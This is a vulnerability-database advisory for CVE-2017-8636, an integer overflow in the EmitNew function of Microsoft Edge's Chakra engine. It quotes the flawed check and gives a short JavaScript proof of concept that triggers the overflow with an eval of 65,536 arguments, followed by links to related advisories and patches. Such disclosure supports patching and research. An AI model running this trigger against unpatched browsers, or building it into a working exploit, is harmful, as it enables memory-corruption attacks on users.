Lucene search
Nu11SSV:96362HistoryAug 17, 2017 - 12:00 a.m.
Microsoft Edge: Chakra: Integer overflow in EmitNew(CVE-2017-8636)
2017-08-1700:00:00
nu11
www.seebug.org
18
0.888 High
EPSS
Percentile
98.7%
The bytecode generator uses the âEmitNewâ function to handle new operators.
Hereâs the code how the function checks for integer overflow.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
Js::ArgSlot argCount = pnode->sxCall.argCount;
argCount++; // include "this"
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
...
}
âJs::ArgSlotâ is a 16 bit unsigned integer type. And âargCountâ is of the type âJs::ArgSlotâ. So âif (argCount != (Js::ArgSlot)argCount)â has no point. It canât prevent the integer overflow at all.
PoC:
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');
Related
packetstorm
packetstorm
Microsoft Edge Chakra Heap Buffer Overflow
2017-08-20 00:00:00
Microsoft Edge Chakra NULL Pointer Dereference
2017-08-20 00:00:00
Microsoft Edge Chakra EmitNew Integer Overflow
2017-08-17 00:00:00
zdt
zdt
Microsoft Edge Chakra - Buffer Overflow Exploit
2017-08-18 00:00:00
Microsoft Edge Chakra - NULL Pointer Dereference Exploit
2017-08-18 00:00:00
Microsoft Edge Chakra EmitNew Integer Overflow Exploit
2017-08-17 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2017-08-08 07:00:00
symantec
symantec
checkpoint_advisories
checkpoint_advisories
Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-8636)
2017-08-28 00:00:00
openvas
openvas
Microsoft Internet Explorer Multiple Vulnerabilities (KB4034733)
2017-06-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4034664)
2017-08-09 00:00:00
Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4034665)
2017-08-09 00:00:00
mskb
mskb
Cumulative security update for Internet Explorer: August 8, 2017
2017-08-08 07:00:00
August 8, 2017âKB4034664 (Monthly Rollup)
2017-08-08 07:00:00
August 8, 2017âKB4034665 (Monthly Rollup)
2017-08-08 07:00:00
nessus
nessus
Security Updates for Internet Explorer (August 2017)
2017-11-30 00:00:00
Windows 7 and Windows Server 2008 R2 August 2017 Security Updates
2017-08-08 00:00:00
Windows 2008 August 2017 Multiple Security Updates
2017-08-08 00:00:00
kaspersky
kaspersky
KLA11846 Multiple vulnerabilities in Microsoft Products (ESU)
2017-08-08 00:00:00
cve
cve
cvelist
cvelist
nvd
nvd
prion
prion
Memory corruption
2017-08-08 21:29:00
Memory corruption
2017-08-08 21:29:00
Memory corruption
2017-08-08 21:29:00
osv
osv
CVE-2017-8636
2017-08-08 21:29:00
CVE-2017-8641
2017-08-08 21:29:01
trendmicroblog
trendmicroblog
talosblog
talosblog
Microsoft Patch Tuesday - August 2017
2017-08-08 11:30:00